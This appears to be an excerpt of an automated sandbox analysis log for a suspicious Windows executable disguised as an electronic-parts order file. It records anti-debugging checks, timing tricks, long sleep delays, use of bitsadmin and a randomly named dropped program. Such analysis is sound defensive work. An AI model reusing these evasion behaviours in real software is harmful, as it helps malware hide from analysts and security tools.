Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Memory allocated: 5230000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Memory allocated: 6230000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Memory allocated: 6360000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Memory allocated: 7360000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Memory allocated: B250000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Memory allocated: C250000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Memory allocated: C6E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Memory allocated: D6E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Memory allocated: E6E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Memory allocated: F6E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Memory allocated: 106E0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe

Code function: 2_2_0174096E rdtsc

2_2_0174096E

Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\bitsadmin.exe	API coverage: 2.8 %

Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe TID: 6984	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 6932	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 6932	Thread sleep time: -70000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe TID: 1892	Thread sleep time: -50000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\bitsadmin.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\bitsadmin.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\bitsadmin.exe

Code function: 7_2_006BC390 FindFirstFileW,FindNextFileW,FindClose,

7_2_006BC390

Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: bitsadmin.exe, 00000007.00000002.3524147073.0000000000862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~'Y
Source: firefox.exe, 00000009.00000002.2571647429.00000243B54EC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll)
Source: cvSKtqilyhlQ.exe, 00000008.00000002.3524686640.000000000128F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe

Code function: 2_2_0174096E rdtsc

2_2_0174096E

Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe

Code function: 2_2_004176A3 LdrLoadDll,

2_2_004176A3

Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017D4164 mov eax, dword ptr fs:[00000030h]	2_2_017D4164
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017D4164 mov eax, dword ptr fs:[00000030h]	2_2_017D4164
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01798158 mov eax, dword ptr fs:[00000030h]	2_2_01798158
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01706154 mov eax, dword ptr fs:[00000030h]	2_2_01706154
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01706154 mov eax, dword ptr fs:[00000030h]	2_2_01706154
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_016FC156 mov eax, dword ptr fs:[00000030h]	2_2_016FC156
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01794144 mov eax, dword ptr fs:[00000030h]	2_2_01794144
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01794144 mov eax, dword ptr fs:[00000030h]	2_2_01794144
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01794144 mov ecx, dword ptr fs:[00000030h]	2_2_01794144
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01794144 mov eax, dword ptr fs:[00000030h]	2_2_01794144
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01794144 mov eax, dword ptr fs:[00000030h]	2_2_01794144
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01730124 mov eax, dword ptr fs:[00000030h]	2_2_01730124
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017AA118 mov ecx, dword ptr fs:[00000030h]	2_2_017AA118
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017AA118 mov eax, dword ptr fs:[00000030h]	2_2_017AA118
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017AA118 mov eax, dword ptr fs:[00000030h]	2_2_017AA118
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017AA118 mov eax, dword ptr fs:[00000030h]	2_2_017AA118
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017C0115 mov eax, dword ptr fs:[00000030h]	2_2_017C0115
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017AE10E mov eax, dword ptr fs:[00000030h]	2_2_017AE10E
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017AE10E mov ecx, dword ptr fs:[00000030h]	2_2_017AE10E
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017AE10E mov eax, dword ptr fs:[00000030h]	2_2_017AE10E
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017AE10E mov eax, dword ptr fs:[00000030h]	2_2_017AE10E
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017AE10E mov ecx, dword ptr fs:[00000030h]	2_2_017AE10E
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017AE10E mov eax, dword ptr fs:[00000030h]	2_2_017AE10E
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017AE10E mov eax, dword ptr fs:[00000030h]	2_2_017AE10E
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017AE10E mov ecx, dword ptr fs:[00000030h]	2_2_017AE10E
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017AE10E mov eax, dword ptr fs:[00000030h]	2_2_017AE10E
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017AE10E mov ecx, dword ptr fs:[00000030h]	2_2_017AE10E
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017301F8 mov eax, dword ptr fs:[00000030h]	2_2_017301F8
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017D61E5 mov eax, dword ptr fs:[00000030h]	2_2_017D61E5
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0177E1D0 mov eax, dword ptr fs:[00000030h]	2_2_0177E1D0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0177E1D0 mov eax, dword ptr fs:[00000030h]	2_2_0177E1D0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0177E1D0 mov ecx, dword ptr fs:[00000030h]	2_2_0177E1D0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0177E1D0 mov eax, dword ptr fs:[00000030h]	2_2_0177E1D0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0177E1D0 mov eax, dword ptr fs:[00000030h]	2_2_0177E1D0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017C61C3 mov eax, dword ptr fs:[00000030h]	2_2_017C61C3
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017C61C3 mov eax, dword ptr fs:[00000030h]	2_2_017C61C3
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0178019F mov eax, dword ptr fs:[00000030h]	2_2_0178019F
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0178019F mov eax, dword ptr fs:[00000030h]	2_2_0178019F
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0178019F mov eax, dword ptr fs:[00000030h]	2_2_0178019F
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0178019F mov eax, dword ptr fs:[00000030h]	2_2_0178019F
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01740185 mov eax, dword ptr fs:[00000030h]	2_2_01740185
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017BC188 mov eax, dword ptr fs:[00000030h]	2_2_017BC188
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017BC188 mov eax, dword ptr fs:[00000030h]	2_2_017BC188
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_016FA197 mov eax, dword ptr fs:[00000030h]	2_2_016FA197
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_016FA197 mov eax, dword ptr fs:[00000030h]	2_2_016FA197
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_016FA197 mov eax, dword ptr fs:[00000030h]	2_2_016FA197
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017A4180 mov eax, dword ptr fs:[00000030h]	2_2_017A4180
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017A4180 mov eax, dword ptr fs:[00000030h]	2_2_017A4180
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0172C073 mov eax, dword ptr fs:[00000030h]	2_2_0172C073
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01702050 mov eax, dword ptr fs:[00000030h]	2_2_01702050
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01786050 mov eax, dword ptr fs:[00000030h]	2_2_01786050
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01796030 mov eax, dword ptr fs:[00000030h]	2_2_01796030
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_016FA020 mov eax, dword ptr fs:[00000030h]	2_2_016FA020
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_016FC020 mov eax, dword ptr fs:[00000030h]	2_2_016FC020
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0171E016 mov eax, dword ptr fs:[00000030h]	2_2_0171E016
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0171E016 mov eax, dword ptr fs:[00000030h]	2_2_0171E016
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0171E016 mov eax, dword ptr fs:[00000030h]	2_2_0171E016
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0171E016 mov eax, dword ptr fs:[00000030h]	2_2_0171E016
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01784000 mov ecx, dword ptr fs:[00000030h]	2_2_01784000
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017A2000 mov eax, dword ptr fs:[00000030h]	2_2_017A2000
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017A2000 mov eax, dword ptr fs:[00000030h]	2_2_017A2000
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017A2000 mov eax, dword ptr fs:[00000030h]	2_2_017A2000
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017A2000 mov eax, dword ptr fs:[00000030h]	2_2_017A2000
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017A2000 mov eax, dword ptr fs:[00000030h]	2_2_017A2000
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017A2000 mov eax, dword ptr fs:[00000030h]	2_2_017A2000
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017A2000 mov eax, dword ptr fs:[00000030h]	2_2_017A2000
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017A2000 mov eax, dword ptr fs:[00000030h]	2_2_017A2000
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017420F0 mov ecx, dword ptr fs:[00000030h]	2_2_017420F0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_016FA0E3 mov ecx, dword ptr fs:[00000030h]	2_2_016FA0E3
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017860E0 mov eax, dword ptr fs:[00000030h]	2_2_017860E0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017080E9 mov eax, dword ptr fs:[00000030h]	2_2_017080E9
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_016FC0F0 mov eax, dword ptr fs:[00000030h]	2_2_016FC0F0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017820DE mov eax, dword ptr fs:[00000030h]	2_2_017820DE
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017C60B8 mov eax, dword ptr fs:[00000030h]	2_2_017C60B8
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017C60B8 mov ecx, dword ptr fs:[00000030h]	2_2_017C60B8
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_016F80A0 mov eax, dword ptr fs:[00000030h]	2_2_016F80A0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017980A8 mov eax, dword ptr fs:[00000030h]	2_2_017980A8
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0170208A mov eax, dword ptr fs:[00000030h]	2_2_0170208A
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017A437C mov eax, dword ptr fs:[00000030h]	2_2_017A437C
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0178035C mov eax, dword ptr fs:[00000030h]	2_2_0178035C
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0178035C mov eax, dword ptr fs:[00000030h]	2_2_0178035C
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0178035C mov eax, dword ptr fs:[00000030h]	2_2_0178035C
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0178035C mov ecx, dword ptr fs:[00000030h]	2_2_0178035C
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0178035C mov eax, dword ptr fs:[00000030h]	2_2_0178035C
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0178035C mov eax, dword ptr fs:[00000030h]	2_2_0178035C
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017A8350 mov ecx, dword ptr fs:[00000030h]	2_2_017A8350
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017CA352 mov eax, dword ptr fs:[00000030h]	2_2_017CA352
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01782349 mov eax, dword ptr fs:[00000030h]	2_2_01782349
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01782349 mov eax, dword ptr fs:[00000030h]	2_2_01782349
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01782349 mov eax, dword ptr fs:[00000030h]	2_2_01782349
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01782349 mov eax, dword ptr fs:[00000030h]	2_2_01782349
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01782349 mov eax, dword ptr fs:[00000030h]	2_2_01782349
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01782349 mov eax, dword ptr fs:[00000030h]	2_2_01782349
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01782349 mov eax, dword ptr fs:[00000030h]	2_2_01782349
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01782349 mov eax, dword ptr fs:[00000030h]	2_2_01782349
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01782349 mov eax, dword ptr fs:[00000030h]	2_2_01782349
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01782349 mov eax, dword ptr fs:[00000030h]	2_2_01782349
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01782349 mov eax, dword ptr fs:[00000030h]	2_2_01782349
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01782349 mov eax, dword ptr fs:[00000030h]	2_2_01782349
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01782349 mov eax, dword ptr fs:[00000030h]	2_2_01782349
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01782349 mov eax, dword ptr fs:[00000030h]	2_2_01782349
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01782349 mov eax, dword ptr fs:[00000030h]	2_2_01782349
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017D634F mov eax, dword ptr fs:[00000030h]	2_2_017D634F
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017D8324 mov eax, dword ptr fs:[00000030h]	2_2_017D8324
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017D8324 mov ecx, dword ptr fs:[00000030h]	2_2_017D8324
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017D8324 mov eax, dword ptr fs:[00000030h]	2_2_017D8324
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017D8324 mov eax, dword ptr fs:[00000030h]	2_2_017D8324
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01720310 mov ecx, dword ptr fs:[00000030h]	2_2_01720310
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173A30B mov eax, dword ptr fs:[00000030h]	2_2_0173A30B
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173A30B mov eax, dword ptr fs:[00000030h]	2_2_0173A30B
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173A30B mov eax, dword ptr fs:[00000030h]	2_2_0173A30B
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_016FC310 mov ecx, dword ptr fs:[00000030h]	2_2_016FC310
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0171E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0171E3F0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0171E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0171E3F0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0171E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0171E3F0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017363FF mov eax, dword ptr fs:[00000030h]	2_2_017363FF
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017103E9 mov eax, dword ptr fs:[00000030h]	2_2_017103E9
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017103E9 mov eax, dword ptr fs:[00000030h]	2_2_017103E9
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017103E9 mov eax, dword ptr fs:[00000030h]	2_2_017103E9
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017103E9 mov eax, dword ptr fs:[00000030h]	2_2_017103E9
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017103E9 mov eax, dword ptr fs:[00000030h]	2_2_017103E9
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017103E9 mov eax, dword ptr fs:[00000030h]	2_2_017103E9
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017103E9 mov eax, dword ptr fs:[00000030h]	2_2_017103E9
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017103E9 mov eax, dword ptr fs:[00000030h]	2_2_017103E9
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017AE3DB mov eax, dword ptr fs:[00000030h]	2_2_017AE3DB
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017AE3DB mov eax, dword ptr fs:[00000030h]	2_2_017AE3DB
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017AE3DB mov ecx, dword ptr fs:[00000030h]	2_2_017AE3DB
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017AE3DB mov eax, dword ptr fs:[00000030h]	2_2_017AE3DB
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017A43D4 mov eax, dword ptr fs:[00000030h]	2_2_017A43D4
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017A43D4 mov eax, dword ptr fs:[00000030h]	2_2_017A43D4
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0170A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0170A3C0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0170A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0170A3C0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0170A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0170A3C0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0170A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0170A3C0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0170A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0170A3C0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0170A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0170A3C0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017083C0 mov eax, dword ptr fs:[00000030h]	2_2_017083C0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017083C0 mov eax, dword ptr fs:[00000030h]	2_2_017083C0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017083C0 mov eax, dword ptr fs:[00000030h]	2_2_017083C0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017083C0 mov eax, dword ptr fs:[00000030h]	2_2_017083C0
